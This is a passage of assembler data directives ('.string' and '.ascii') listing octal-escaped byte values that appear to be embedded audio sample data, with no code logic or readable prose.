"\006\006\372\357\350\350\346\333\320\317\325\331\326\322\330\343\351\350\345\347\356\357\350\340\337\343\342\335\332\336\352\361\363\367\001\017\027\030\027\034!!\031\021\017\021\016\005" .string "\002\b\013\b\007\r\026\031\030\026\031\034\030\020\n\006\b\003\374\367\367" .string "\002\001" .string "\b\023\025\022\023\026\030\030\017\n\n\013\003\376\370\374\002\001\376\377\b\r\017\013\013\013\t\003\371\357\351\346\340\323\314\316\322\324\322\331\340\352\360\357\363\374\002\003\377" .string "\004\t\b\005\b\r\025\026\031\034$()%%('!\030\022\020\016\006\377\375\376" .string "" .string "\376\001\007\013\n\t\b\013\n\006\377\373\372\370\362\356\354\360\362\363\363\367\376\002\005\003\006\b\t\005\377\375\373\371\364\357\356\361\364\363\362\366\371\373\373\367\370\370\366\360\347\345\342\336\334\327\327\332\334\335\341\350\360\367\372\375\003\b\013\n\007\b\f\f\013\t\f\017\022\022\024\032\037 \" \"\" \033\024\024\021\r\b\004\003\006\006\006\007\f\021\023\022\022\024\025\022\r\t\007\006\001\377\374\375\001\002\002\004\n\016\020\020\020\020\021\016\t\004" .string "\377\372\364\360\360\357\354\351\347\350\350\346\343\341\341\340\335\330\327\326\326\327\326\327\335\344\351\356\366\377\006\r\020\024\031\034\034\030\027\026\025\021\f\n\n\n\t\b\t\f\016\017\013\013\013\n\006\376\374\372\370\362\356\354\360\361\361\361\363\367\372\373\372\374\374\375\371\367\365\363\361\357\356\355\360\360\363\364\366\372\376\375\376\376\376\376\373\367\363\360\355\350\345\343\342\342\342\341\342\346\347\347\347\350\352\352\350\350\351\352\353\354\356\361\367\374" .string "\006\r\022\030\032\034 !# \037\035\033\032\027\025\025\025\026\026\027\031\033\034\034\033\034\033\032\027\023\022\021\016\013\n\t\n\013\n\013\016\021\022\023\024\025\025\025\023\021\017\016\f\n\t\007\t\t\b\n\013\r\r\013\t\b\005\001\373\365\357\352\345\337\335\332\332\332\332\336\341\345\350\353\360\364\367\372\375\376\002\006\b\n\r\020\023\026\031\033\036 ! \035\032\027\024\020\016\n\006\004\002\001" .string "\377" .string "\377\001\001" .string "" .string "\001" .string "\375\373\370\366\365\363\361\357\361\362\362\362\365\367\372\373\373\375\374\375\373\372\370\367\365\363\362\361\361\361\360\360\361\362\361\360\357\355\354\351\346\342\337\335\332\330\326\326\330\331\334\337\342\347\354\357\364\370\375" .string "\001\004\005\b\t\n\013\f\017\020\021\024\026\027\030\031\032\031\031\030\025\023\020\017\f\t\b\007\b\b\007\b\n\013\f\013\f\f\013\n\t\006\005\004\002\001" .string "\001\002\002\004\005\007\t\n\013\013\013\n\t\006\005\003" .string "\375\372\370\365\364\361\356\354\353\350\346\345\342\340\337\335\334\333\333\333\334\336\340\344\350\354\362\370\375\004\b\r\022\025\031\031\032\033\031\032\027\025\025\023\023\022\021\022\021\020\r\t\007\006\006\003\002" .string "\001\377\377\376\376\375\377\376" .string "" .string "\002\003\003\006\003\007\375\001\365\370\370\003\362\r1\002\006\367\003\376\364\t\017" .string "\t(\004\377\030\006\364\b\004\374\031\022\f\026\370\363\b\026\377\376\n\360\341\372\363\345\006\325\331\341\332\352\330\312\302\331\312\334\363\371\363\341\334\353\354\363\022\361\336\357\r" .string "\r'\375\016\f\346\006\363\362" .string "\333\357\357\351" .string "\005\037-/*\n\n\n\376\371\002\366\337\340\331\310\315\360\005\020\030$\027\377\016)\033\022 \024\023! %&\373\b\374\372\r\376\034\f\004\007\370\367\004\001\n\023\007\n\021\016" .string "\013\n\n$-.2+'\023\f%\"'1,1FL<>3\030#\035\b\005\355\345\321\313\331\322\340\357\360\003\006\365\344\313\303\333\364\375\b\n\003\376\374\366\374\b\020\022\n\r\r\004\007\n\024'7.\035\036\006\375" .ascii "\346\356\366\363\366\362\366\356\346\351\345\344\356\347" .string "\363\365\351\362\370\366\366\376\375\374\377" .string "\371\357\345\344\336\340\342\353\344\337\340\317\323\324\321\341\337\336\350\331\336\350\352\363\357\360\357\333\346\344\332\344\347\353\360\370\003 422/\034\024\r\001\370\355\343\324\310\310\311\317\325\350\357\357\370\364\366\374" .string "\006\017\020\024\025\027\034\030\033\025\020\022\022 \"\"(%\036\025\027\026\017\023\020\t\n\007\006\377\370" .string "\377\006\016\022\022\017\017\005\n\f\022\034\035 09EG@<11+%\034\020\001\366\353\346\351\356\361\364\365\356\335\304\262\257\266\311\327\342\354\356\360\354\356\363\365\377\007\r\023\021\027\034%7AEF?7)\033\022\004\001\374\371\371\367\357\351\341\330\323\325\331\333\337\340\343\342\343\342\341\342\352\361\365\372\371\364\360\357\353\361\364\367\375\373\372\365\360\357\352\353\350\344\344\341\341\341\333\332\333\325\322\322\321\316\317\320\320\325\336\351\373\016\037*)'\036\027\020\017\013\003\001\370\362\356\352\357\363\367\374\376" .string "\376\375\376\374\373\376\377\005\n\r\017\017\f\t\n\n\020\031\037%))% \"%),.+)#\031\026\022\020\026\026\026\024\016\t\004" .string "" .string "\003\n\020\027\")-.*''&#!\035\024\f\006\002\003\007\016\023\023\020\004\357\331\312\304\310\323\334\344\351\347\346\345\343\346\355\364\374\001\004\007\n\021\033*5:=:3*\"\031\023\021\021\022\022\020\n\001\370\360\351\350\350\350\350\346\342\334\327\323\320\321\326\332\341\343\342\341\335\334\335\341\350\357\365\366\366\366\364\365\367\370\371\374\376\375\375\372\365\360\352\346\342\337\332\325\317\313\311\311\316\332\350\365\001\007\b\004\376\371\367\364\365\365\364\363\361\362\364\371" .string "\007\020\026\031\033\032\027\024\023\020\020\021\022\023\020\f\006" .string "\376\377\003\b\r\021\021\020\016\013\f\016\023\033!%'&$! !#(+,+' \033\027\025\025\030\032\037\"\" \034\027\023\017\016\f\t\004\375\370\363\362\364\371\377\004\006\002\367\351\333\321\322\330\342\355\365\371\372\370\370\366\370\373" .ascii "\003\004\004\003\004\005\013\024\033\037 \035" .string "\027\017\b\001\376\375\377\002\004\005\002\376\372\365\365\367\372\374\377\375\371\364\355\347\343\341\341\343\344\342\336\331\324\320\316\320\324\331\334\336\337\336\335\335\336\341\345\352\357\362\364\364\364\363\361\362\361\361\357\353\350\343\337\337\341\347\356\365\372\372\367\361\352\344\337\334\334\333\333\333\333\335\340\346\355\366\377\007\016\023\026\027\030\031\033\036\"%&%#\037\032\027\026\026\027\027\026\023\016\t\005\003\003\005\b\f\017\020\020\017\016\016\020\024\027\034\037 \037\036\036 #',1442.(\"\035\027\022\f\005\375\367\361\355\354\355\356\356\354\346\336\323\311\305\305\313\323\335\346\356\363\370\374\001\006\013\021\025\030\032\034\035 #&((%\037\027\020\007\001\373\367\366\364\363\362\360\355\352\351\352\353\356\361\362\363\363\362\361\357\357\360\361\363\364\364\363\360\355\353\350\350\347\347\346\345\343\340\335\333\332\332\333\334\337\341\342\344\344\345\346\346\347\347\347\347\346\346\347\352\356\364\372" .string "\003\005\003" .ascii "\373\366\362\355\352\347\345\343\343\344\345\351\355\363\370" .ascii "\375\002\006\t\013\f\017\021\024\030\034\037 !\"\"#$%'('%\"\037" .ascii "\035\032\030\030\030\030\027\026\024\022\017\016\r\r\016\017" .ascii "\021\021\022\022" .string "\023\024\027\032\037$)-010.+($!\034\027\022\r\b\004\001\376\373\367\361\351\337\326\316\310\307\311\315\324\332\341\346\355\362\370\375\002\t\016\023\027\034!&+/120-(!\034\025\020\013\006\003\376\373\366\363\360\355\353\353\352\352\352\352\351\350\350\347\347\351\352\354\356\357\360\360\361\362\362\363\364\365\364\364\363\362\357\355\353\351\351\350\350\347\350\347\346\345\345\343\342\341\340\337\336\336\337\342\345\352\356\363\366\367\370\370\367\365\363\362\361\360\360\361\361\364\366\371\374\377\003\005\b\t\n\013\f\f\r\016\021\022\023\025\026\027\030\032\033\035\036\036\037\036\036\035\036\035\036\036\037\037 \037\036\034\032\030\027\025\024\024\023\022\021\020\020\021\021\023\025\030\034\036 ! \036\035\032\030\025\023\020\r\n\t\006\003\002\377\373\366\357\347\337\330\324\321\322\323\327\333\337\343\350\353\360\365\370\375\001\006\n\017\024\031\036!$%$\" \035\031\026\022\017\f\t\006\003" .string "\375\372\367\366\363\362\357\356\353\352\347\345\344\343\343\342\343\343\344\345\346\347\347\350\351\352\353\354\355\355\355\354\355\354\353\354\354\355\356\356\356\355\355\353\352\347\345\342\341\336\335\334\335\336\340\343\345\346\347\350\347\347\346\345\345\345\346\347\352\355\361\364\371\376\001\006\t\f\016\020\021\022\022\023\023\024\025\025\024\025\025\025\024\025\026\025\024\025\024\023\022\023\022\023\024\025\026\027\030\030\027\027\026\027\026\026\026\026\025\026\025\026\025\026\027\030\031\032\033\033\032\031\026\024\021\016\013\t\006\003\001" .string "\375\374\371\366\363\356\351\343\336\331\326\325\326\330\333\340\344\351\354\361\364\371\374" .string "\004\007\n\017\022\025\031\033\035\035\034\033\030\026\023\020\016\013\b\007\004\002" .string "\377\374\373\372\371\370\366\365\364\362\361\356\355\354\353\352\351\352\351\351\350\350\350\350\350\350\351\352\351\351\352\351\351\352\352\353\353\354\356\357\360\361\361\360\360\357\355\354\351\350\347\347\346\346\346\347\350\350\350\347\346\345\344\343\343\342\344\345\350\352\357\362\370\375\005\n\020\023\027\031\034\035\036\037\036\035\032\032\026\027\022\025\016\021\n\017\376\371\002\006\035\365\335*\366\351\352\277\032A6\362\035\036\375!\002\353\030\352\b&\366\355\325\003\263\310\376\253\322\341\317;\021\330\376\354\377F4&\016\370\326\265\330\305\341\346\007\352\331\336\357\371\371\002\316\350\362\344\310\347\354\314\320\241\246\305\257\264\255\272\334\327\335\342\367 \024\021\004\347" .string "\003\350\324\345\354\330\333\325\335\003\025&)5<#\035\031#.50\f\032/4I<-KJAFIQ<2\034 0(\036\032\t\016%\031\026\0337(#+$0!\002\361\353\352\363\337\324\351\362\374\036#\033.\026\377\003\370\371\344\274\266\267\300\274\257\307\301\330\351\333\347\330\332\345\357\362\002\032\006\360\357\372\007\376\363" .string "\004\024'\033 :Zf\\_TWI-*#('\017\t\025\032\032\r\030'',\027\n\030\017\373\356\361\360\360\360\324\323\345\347\337\331\334\351\355\346\337\334\326\330\310\267\300\303\317\307\256\266\275\301\310\305\324\355\360\342\316\310\321\310\310\277\272\313\323\322\327\367\020\027\037\025\0343.#\f\002\b\372\352\345\355\377\t\r\001\f\037\033&'8STH>@FA7+$.%\023\027\033'6/)5ED9+%*!\024\007\004\013\006\365\360\372\002\006\001\374\006\023\022\t\001\377\017\025\013\f\n\b\374\346\337\336\350\346\327\327\335\346\352\344\336\346\360\350\325\302\264\261\257\255\272\314\343\356\353\364\005\031\023\020\022\030$\034\020\022\037.:419A>16=@=,(/.!\020\006\013\n" .ascii "\364\363\375\b\t\001\r\030\034\030\r\b\016\020\376\351\345\346" .ascii "\342\334\313\317\336\343\344\340\350\367\376\365\343\334\343" .ascii "\341\327\311\304\314\310\270\247\247\255\265\265\263\301\325" .ascii "\343\345\351\367\013\n\371\350\346\344\336\317\276\302\311\316" .ascii "\316\320\340\373\006\001\377\003\017\r\002\375\001\016\016\003" .ascii "\377\007\031 \035\035+<?;7=FB5''1.!\034'8:77APMD@?F>+! $\036" .ascii "\020\020\032,89?IOH8*&#\022\370\350\347\345\336\323\322\336\351" .ascii "\347\325\310\310\314\311\303\310\322\336\332\313\312\315\323" .ascii "\316\304\310\327\345\350\347\362\t % \035 \034\n\366\352\352" .ascii "\351\335" .string "\321\322\340\353\350\342\352\370\002\375\365\364\372\375\360\343\340\347\350\342\331\337\360\371\371\366" .string "\020\030\026\016\020\030\027\013\375\373\005\005\372\356\363\002\013\f\013\024#&\032\n\007\t\002\363\347\350\361\367\364\362\001\024\033\027\020\024\037\034\017\001\374\376\366\345\332\335\350\351\337\334\344\362\373\371\372\t\027\030\017\006\b\r\006\365\351\351\357\354\341\334\346\363\367\363\364" .string "\020\021\t\005\t\017\t\372\356\360\366\360\346\344\360\376\002\377\003\022\037!\031\027\",,!\034 \"\031\t\002\b\020\016\006\007\025\" \030\027\034\037\017\364\342\334\333\325\317\330\354" .ascii "\b\t\024'54,-6:2&&1:7-,491((37-!\034\037\034\f\370\361\362\361" .string "\346\333\335\350\357\354\347\354\372\377\370\354\355\362\357\341\322\315\321\321\305\273\277\313\322\320\316\327\345\352\343\331\332\341\337\323\310\306\311\305\271\256\261\273\277\276\276\313\335\347\347\347\356\370\365\350\334\332\332\323\307\300\304\316\324\324\332\351\375\006\005\004\f\023\022\b\003\006\013\n\003\002\n\026\034\034\036)6952593( !$!\032\030!+.-/9BC=;>A:/()*& !,8?AELPJ?74/\"\023\t\b\005\376\365\363\367\370\361\346\341\341\342\341\337\342\353\360\356\351\350\354\357\354\352\355\366\377\003\006\017\035&'# \037\030\013\375\364\357\352\340\327\326\331\333\331\327\333\342\346\344\340\336\341\336\325\315\310\310\306\302\277\302\311\316\321\322\330\340\344\343\340\341\344\341\332\324\322\324\322\315\312\316\327\336\341\344\353\364\366\362\356\356\356\352\344\336\340\345\347\350\353\363\374\001\002\003\b\f\f\007\003\003\004\002\376\374" .string "\005\007\b\n\021\031\037#'/79879;70,+,)%$(,--/3885454/'\"\037\036\032\025\024\027\033\034\034\036$()((,.-'\"\037\033\024\013\006\005\004\001\375\375\377" .string "\375\370\364\361\351\335\316\304\274\267\264\263\267\300\311\320\326\337\350\360\364\365\370\375\377\376\375\377\003\005\005\004\004\006\005\003" .string "\377" .string "\377\373\366\363\360\355\346\340\334\333\332\327\325\326\331\333\334\335\337\344\347\346\346\347\351\350\345\342\340\341\340\336\335\337\343\347\350\353\357\362\365\365\364\365\367\367\364\362\362\361\357\353\351\351\353\354\355\360\366\374\001\004\006\t\013\t\006\001\376\374\370\365\363\365\371\375\001\007\016\027\033\036!$&&$###\"!!$')*,1454221-'#! \035\033\033\034\036\037\037 #$#\" \037\036\033\026\024\023\022\020\020\021\025\031\034\036\037 \035\030\023\017\n\003\374\367\362\357\352\346\342\337\333\326\317\313\311\310\307\310\313\317\322\325\327\332\335\341\343\346\352\360\365\373" .string "\007\016\023\026\026\025\023\017\t\003\375\370\364\357\353\351\350\350\347\347\350\352\353\352\351\350\347\345\341\336\334\333\331\330\327\331\333\336\340\343\346\351\353\354\354\355\354\353\351\346\345\345\344\343\343\346\351\354\357\362\364\367\370\366\365\364\362\360\355\353\353\354\354\356\357\362\365\367\370\371\373\374\375\374\375\375\376\377" .ascii "\002\005\b\013\016\021\025\032\035!$'+-./00/.,+*)('()()*+---" .ascii "-,+)%#! \035\034\033\034\035\035\036!\"$&'()" .string ")(&$!\035\031\025\022\017\f\n\b\006\006\004\001\375\370\364\354\345\334\326\317\313\312\311\314\320\326\333\340\347\356\362\367\373\376\001\004\007\b\013\f\016\016\017\016\r\f\013\b\006\005\002\377\373\370\365\362\355\352\347\344\343\340\336\335\336\335\334\334\335\336\336\336\335\336\335\335\333\332\332\331\330\327\330\330\331\332\333\334\336\337\340\341\342\342\343\344\343\342\342\341\337\335\334\334\333\333\333\335\336\341\342\344\345\346\346\345\344\343\342\340\337\336\340\342\346\351\356\363\371\377\004\007\f\016\021\022\023\024\026\027\027\031\032\034\035\" &\034* \"5'3\024\030 !%07\037IH9<*\026\006\034)+\036%\002\017%\017\006\017\032\366$\021\0345\0322+)2'(,,$\021*7\033\022\027\f\005\371\365\363\357\364\377\350\351\377\355\343\363\001\350\350\352\370\372\376\003\f0\020#3*42,1;65)&#\035\005\003\b\r\013\b\025\n\370" .string "\374\353\367\354\345\332\337\331\316\332\310\316\342\345\355\355\360\360\342\364\355\343\375\362\364\003\362\371\372\356\356\353\355\353\371\377\355\342\353\320\307\321\322\321\316\325\305\306\315\312\275\265\302\303\320\334\322\325\317\322\326\331\364\355\365\007\362\004\006\364\016\016\004\016\026\027\017\017\002\367\004\374\005\007\013\r\374" .string "\367\352\361\373\364\375\016\020\006\f\026\t\007\f\030$%&\023\026\024\001\030\017\n\036\030\026\035\f\b\f\b\013\017\026\016\004" .string "\371\354\361\360\356\367\002\376\373\003\367\361\360\357\361\363\370\362\361\360\351\345\344\355\360\366\377\001\005\004\371\002\001\374\006\t\024\027\023\r\005\f\016\016\031\035\036!#\033\025\021\022\023\032###\"\034\017\r\f\f\017\017\021\017\013\003\366\366\364\356\371\370\367\372\362\357\345\337\344\345\356\364\370\375\366\365\366\366\374\004\f\022\025\031\025\r\n\004" .string "\001\007\007\n\005\374\370\354\355\350\345\355\346\350\351\333\333\331\323\332\337\350\364\375" .string "\001\b\b\f\025\032$*//--*$(-/461&\"\031\024\024\023\025\024\021\017\007\003\376\371\374" .string "\005\r\016\017\017\b\013\f\017\027\034!#\"\037\036\034\032\036 #& \033\026\r\003\376\375\372\372\372\363\354\346\335\326\323\321\320\322\325\321\321\321\312\315\316\324\337\347\360\366\370\370\370\372\375\002\f\021\026\030\031\025\017\f\b\007\b\n\007\002\374\364\353\350\346\346\352\353\360\361\360\356\352\353\352\354\364\366\372\375\367\363\360\355\355\357\362\363\366\364\357\353\344\336\335\332\334\335\335\334\327\321\316\317\317\324\333\341\345\350\347\346\343\343\344\346\355\360\363\363\357\354\350\343\345\346\351\355\354\351\345\340\332\327\330\332\336\343\347\351\347\346\346\347\354\363\372\002\t\f\r\016\017\021\026\035#*-.+(#\037!#%(&$\035\026\020\013\t\t\013\f\013\t\004\377\373\371\374" .string "\007\016\021\023\023\023\023\026\033 &--,)$\037\033\033\034\035\036\032\025\r\001\372\362\355\353\350\345\341\333\323\316\312\312\316\326\340\350\357\364\370\372" .string "\006\017\031$-25421135874.%\034\025\020\f\r\013\n\007" .string "\372\364\360\357\361\365\372\376\377\376\374\372\371\374" .string "\007\f\020\022\020\r\t\007\006\b\013\016\016\r\b\001\373\367\365\365\370\371\370\365\360\353\345\340\340\342\346\352\355\354\353\350\346\345\350\355\363\371\374\374\372\367\364\363\366\373\001\006\n\013\t\006\003\001\002\006\n\r\017\016\n\007\004\003\006\013\021\027\032\033\032\027\026\026\031\036#()($\037\034\032\032\035\037 \037\033\025\016\007\004\003\003\005\006\006\002\375\371\365\365\367\374\001\006\b\b\006\003\002\002\004\t\r\017\017\f\006\377\372\365\362\361\360\356\351\342\333\323\316\314\314\316\323\326\330\330\331\331\333\337\346\357\371" .string "\006\n\f\r\016\021\026\033\037!!\037\032\025\021\017\017\016\016\r\t\003\375\366\360\355\353\353\351\350\346\341\334\330\325\325\330\333\340\343\344\345\344\345\345\350\354\361\366\371\372\371\370\365\364\365\367\371\372\372\367\363\355\350\343\340\337\336\335\332\327\322\315\312\310\310\312\315\320\323\324\324\325\326\331\336\345\354\363\370\375" .ascii "\001\003\006\n\r\022\025\026\026\025\022\017\017\016\016\017" .ascii "\017\016\f\t\005\002\001\002\003\005\b\t\n\t\t\b" .string "\t\f\017\022\025\026\026\025\023\022\021\022\023\025\026\025\023\020\r\n\t\b\b\t\b\007\004\001\376\373\372\372\373\374\375\374\373\370\365\362\361\360\357\357\356\355\352\347\345\344\345\346\351\354\357\362\364\365\367\370\373" .string "\003\b\013\016\017\017\020\020\021\023\026\027\030\031\030\027\026\025\026\026\027\027\030\027\025\022\020\016\f\f\013\n\b\007\004" .string "\375\372\370\367\367\366\366\364\363\362\360\357\360\361\364\367\370\372\372\373\374\376\377\002\005\007\b\t\007\006\005\002\001" .string "\377\376\374\371\366\361\356\353\350\347\346\345\343\342\341\340\340\341\344\347\354\361\366\373" .string "\003\b\f\021\026\033\037#%'(()*++,+)&#!\036\035\032\031\030\026\025\022\017\016\016\r\016\017\020\020\021\022\021\022\023\024\026\031\032\033\034\034\033\034\033\034\035\035\034\033\031\027\024\021\016\r\n\007\005\001\376\371\366\361\356\353\350\347\345\342\341\340\337\337\340\343\346\353\356\363\366\371\376\001\006\n\017\024\027\031\034\034\035\035\034\035\034\033\032\031\026\023\021\016\r\f\013\n\t\b\007\006\005\004\003\004\003\004\003\002\001" .string "\377\377\376\375\376\376\375\374\373\371\370\366\366\365\364\364\363\362\362\361\360\361\360\361\362\363\364\364\363\364\363\363\362\361\362\361\360\357\355\352\351\350\346\345\344\343\342\341\340\337\340\340\342\343\346\350\353\355\360\363\366\371\374\001\004\007\n\r\020\021\024\025\027\030\032\032\033\033\032\031\030\027\026\025\024\023\021\020\017\f\n\b\007\006\004\003\002\001\377\376\376\375\376\376\377" .string "\001\002\003\004\005\006\007\b\t\n\t\n\t\b\007\006\005\003\002\377\375\372\365\362\355\351\346\342\335\332\327\323\321\317\317\316\317\322\324\330\333\337\344\350\355\362\370\375\002\007\f\017\022\023\026\027\027\030\030\027\026\024\023\020\r\013\b\007\004\002\377\374\373\371\366\365\364\363\362\362\361\361\360\361\360\361\361\362\362\363\364\364\363\364\365\364\365\364\365\364\365\364\364\363\362\362\361\361\360\360\357\356\354\353\351\350\347\346\344\343\342\341\340\337\336\335\334\335\334\335\334\335\336\337\340\343\346\351\354\357\362\365\370\373\376\001\003\006\007\n\013\r\016\017\020\021\021\022\022\023\022\023\022\023\022\022\021\022\021\021\020\017\017\016\r\f\f\013\013\n\t\b\007\006\006\005\004\004\004\004\003\004\003\004\003\004\004\005\006\005\005\006\005\006\005\005\004\003\001" .string "\376\373\371\366\363\360\354\351\346\343\340\336\334\333\332\333\333\335\336\341\344\347\354\357\364\370\375\002\007\n\017\021\025\027\032\033\034\035\035\036\035\034\032\032\027\027\024\024\017\020\013\013\006\006\376\377\372\373\370\371\370\370\371\370\367\355\361\336\377\016\032\322\354\023\375\033K!\030%\320\362" .string "\t\356\344" .string "2\020:/\024\37567\311#\334\320\315\316\021\b\300\246\267\342\0166D7:\016\030\344\360\r\366\366\352\316\335\343\271\267\272\342\337\344\353\352\361\332\325\315\325\354\330\261\243\261\262\305\316\263\310\311\272\300\265\276\345\330\341\343\337\377\364\020\027\024&!\023\035\032\036,\f\377\b\034\t\021'3B65\035\023#*\027\0353;=C7>Z>915;#\034\013\027!\003\366\032\032 \032\371\023'\033\020\017" .string "\003\030\375\347\354\343\335\312\311\314\331\353\354\351\361\0305-\030\031\n\t\376\343\343\323\316\315\276\316\340\361\367\365\022#&\n\341\342\002\006\002\004" .string "\007\f\n\377\013#(%!3IGAIYchM9:2.\033\017\034%#\034\b\030%\037\025\374\001\006\370\344\326\307\317\325\316\305\320\343\335\330\321\333\335\326\323\313\307\326\314\266\262\265\272\271\272\266\316\330\324\317\316\334\354\362\362\350\356\354\322\305\266\273\315\317\310\324\345\002\030'4=KG<.00\027\374\357\356\370\375\370\002!31++5IJEEGH3\037\026\033\037\027\n\016\021$'\032\"-4(%\034\037\035\007\362\356\367\372\360\350\360\373\002\002\376\374\n\021\004\374\374\372\375\354\333\347\365\006\001\365\371\375\003\374\357\365\375\374\363\343\342\352\356\343\327\336\350\340\312\266\272\320\350\356\362\n\036%\036\027\031#$\024\b\021\030\035\"\":Q\\SIRVSB004(\025\b\004\n\t\374\362\374\006\005" .string "\373\007\023\025\t\374\373\001\366\340\324\325\325\321\306\275\312\327\327\324\323\335\355\354\342\331\334\337\317\275\263\271\304\303\272\272\300\304\301\270\270\305\327\330\320\323\340\360\356\353\353\357\367\356\341\334\347\357\352\341\340\355\375\375\372\376\t\023\n\375\373\006\024\024\016\025#01,4CJF<9@D7*%*/%\035$2:96:IRF:6:;)\031\026\033\034\022\006\f\033#!\036.AKD6.,\"\007\361\347\345\340\320\305\313\332\344\343\336\345\354\341\310\265\261\271\277\266\261\273\306\314\305\300\316\337\350\350\353\370\f\022\021\023 ,&\025\002\376" .ascii "\372\353\343\354\371\376\371\371\004\020\017\004\373\377\007" .string "\377\356\346\352\361\361\351\345\363\003\007\004\006\023! \025\017\023\030\017\376\364\367\376\372\362\362\376\n\013\005\b\026\" \024\016\r\n\372\343\330\334\341\334\326\333\357\004\013\r\022\037'\035\f\002\001\372\347\320\306\311\315\311\305\314\336\356\357\354\362\004\017\013\001\377\004\004\367\346\342\350\354\344\334\342\361\374\374\371\377\017\027\017\007\007\f\r\377\361\360\366\370\362\351\361\001\r\f\n\025\"+%\034\035$%\031\022\031'-&\036#.1(!'12'\035\036$ \020\001\375\373\357\332\315\324\347\365\371\376\021%,'!&-(\033\022\026 #\037!2BF>8=B=.!\035\036\021\373\354\353\354\345\331\323\336\352\354\346\346\360\373\370\353\343\345\347\335\315\303\307\314\306\274\272\305\322\323\316\320\335\350\346\334\327\332\333\317\277\272\277\305\301\270\270\302\313\312\304\306\323\336\334\326\331\343\354\347\336\335\343\346\337\325\325\335\344\342\335\343\362\375\376\375" .string "\n\016\007\376\376\006\013\b\005\013\030#$$+8?;5599/$\"%'!\034!-444;EID<;>;/%\"%$\036\031\036)237BMRLC>:1 \021\013\b\003\372\363\367\376" .string "\374\370\371\370\357\340\323\321\324\322\315\313\320\327\331\330\331\343\357\365\367\373\006\021\026\025\026\033\035\030\013" .string "\373\370\360\347\342\343\347\346\343\342\346\353\351\343\337\340\340\331\320\312\311\313\307\302\302\311\321\324\326\332\342\351\350\345\342\344\345\340\330\324\326\330\327\323\324\333\342\344\347\354\366\376\375\372\370\370\366\356\344\340\340\341\340\340\346\362\375\003\b\016\025\030\025\020\f\n\006\377\367\364\370\373\374\377\006\021\032\036!(1664464.(&&&#!$*-//2574//.+$\037\034\034\032\025\023\023\030\033\032\033\037#$\"\037\036\037\035\031\025\026\030\027\023\017\016\017\r\t\006\005\006\004\375\370\365\363\354\343\331\321\311\277\266\261\262\270\275\302\312\324\336\344\346\351\355\361\361\357\356\361\365\371\374" .ascii "\007\016\020\020\017\020\020\f\006\001\375\371\362\353\345\343" .ascii "\340\335\333\333\337\342\344\346\350\353\355\355\353\352\353" .ascii "\352\347\343\341\341\342\342\341\342\346\353\356\357\362\367" .ascii "\372\372\370\367\370\367\364\360\360\362\363\362\361\362\365" .ascii "\367\367\367\370\373\376\377\377\001\004\005\004\002\001\001" .ascii "\377\374\371\371\372\374\375\377\002\b\016\020\023\026\032\034" .ascii "\033\032\032\034\035\034\035 #&)+-13200/,'!\037\035\033\030\027" .ascii "\030\032\035\036\037!##!\036\035\033\030\023\017\r\f\f\n\n\f" .ascii "\017\022\026\031\036!\"\037\034\030\024\r\005\376\370\365\360" .ascii "\354\351\350\350\347\344\340\335\330\322\313\305\304\302\303" .ascii "\304\306\311\316\323\326" .string "\333\341\350\356\363\371" .string "\007\013\017\022\024\025\023\016\t\006\002\376\371\366\365\364\363\361\361\361\362\361\357\355\354\352\350\344\341\337\336\335\333\334\337\340\343\346\350\353\356\357\357\357\357\356\354\352\350\350\347\346\345\346\351\353\356\361\364\370\373\374\374\373\372\367\364\360\355\354\353\354\354\356\363\367\372\374\377\002\003\001" .string "\376\375\374\371\370\370\373\375" .string "\004\n\020\025\031\036\"&)++,-,+)()(''(*+,,-.-,+*)(%\" \037\036\033\033\033\034\035\035\036 !\"!! !! \037\037\037\035\033\031\027\026\023\021\017\016\013\t\006\002\376\372\364\356\347\337\330\321\313\310\307\310\313\317\324\332\340\345\351\354\361\364\366\367\372\375" .string "\003\007\n\r\020\021\021\020\017\r\n\007\002\377\373\366\361\354\351\347\344\342\341\342\341\342\341\342\341\342\341\340\337\336\335\334\332\331\331\330\331\330\331\333\334\336\337\340\342\342\343\342\342\342\342\341\340\340\341\341\341\341\341\341\343\342\343\342\343\343\344\344\345\346\345\346\345\345\344\344\342\342\342\345\345\350\352\362\366\377\003\n\f\022\023\026\026\027\030\027\031\026\033\027\036\030!\030$\025\033" .string "\016-" .string "\365\002\355\001/\030\t\341?*\352\332+.\356:\020( \335\324\333\374\367\363\314\354\022\307\343\360" .string "\013\352\325\350\347\356\004\030\021\276\341\t\366\312\336\352\324\353\344\325\001#\037)\027PJ\016NJ\362\n$\027\037&\r\345\t\365\304\267\226\247\260\235\270\324\327\302\333\357\026)\031\b.H)2HD\n#\016\362\0307\375\377\026\023\373\355\024\022\004\347\017\005\004\005\365" .string "\032\022\025\351\023\024\334\376\003\026\357\365\357\364\016\013\347\346\b\005\347\n(0\032\035#9S3J:M85?Q2\0254@7*\020\367\367\336\354\315\345\341\257\250\314\347\343\352\357\361\371\371\360\333\375\023\374\356\fG\001\022\022\b\033*\031\003\035\035\r\375.90\030$\025\n\002\352\361\327\330\313\272\355\353\312\316\336\362\346\357\374\365\357\005\370\004\020!\022\370\023\027\017\373 \366\357\371\353\001\371\355\342\350\017\035\367\002\r\025\021\t\016\006\347\346\330\355\374\347\305\223\252\263\256\257\304\271\265\306\325\364\025#\031&LC<JQF\f\031(\030\031\b" .string "\017\034\025\365\367\367\345\342\350\n\363\357\344\337\013\375\r\007\361\367\377\361\002!\007\024\366" .string "\022\n\020\372\001\004\013\r \035\024\022*9)D=2NCBB;@\037\t\036@0,\036\031\021\013\b\360\375\364\330\333\366\325\325\334\322\312\344\337\322\317\270\270\255\276\347\363\341\357\373\033\027\021%-\013\031!\03146\033$PN7\"0\034\n\001\374\375\374\354\332\327\371\367\352\363\362\372\351\336\375\373\323\317\312\342\344\334\310\305\310\300\301\314\332\322\322\316\351\357\030\013\366 \034\026'A2-\017 !\031&\007\364\340\346\333\303\300\277\252\247\260\316\323\325\350\334\005\025\017\b\375\035\377\341\373\364\337\325\317\306\326\352\341\337\344\355\344\353\n\023\023\021\030\"BB<$4H?K>A.,(/)\026\023\006\r\f\007\n\021\f\360\362\375\f\006\354\373\376" .string "\370\364\357\365\363\327\361\003\026\005\006!+55;*1$\035 8&\023\f\031\031\006'#\016\364\347\324\351\343\317\320\344\373\006\003\002\r" .string "\004\f\025\022\007\003\373\373\031\370\355\001\372\370\350\351\333\330\327\327\340\324\363\362\346\362" .string "\005\006\031\030\023\002\004\004\023\030" .string "\351\342\356\343\361\373\374\330\322\372\360\371\020\006\373\f\023\023\022\026\026\376\374\007\005\366\344\332\321\305\312\311\267\273\267\232\253\304\262\261\310\344\337\351\t\006\f\017\021\r\017\034\017\362\352\365\365\362\365\350\355\365\374\003\017!\023\037 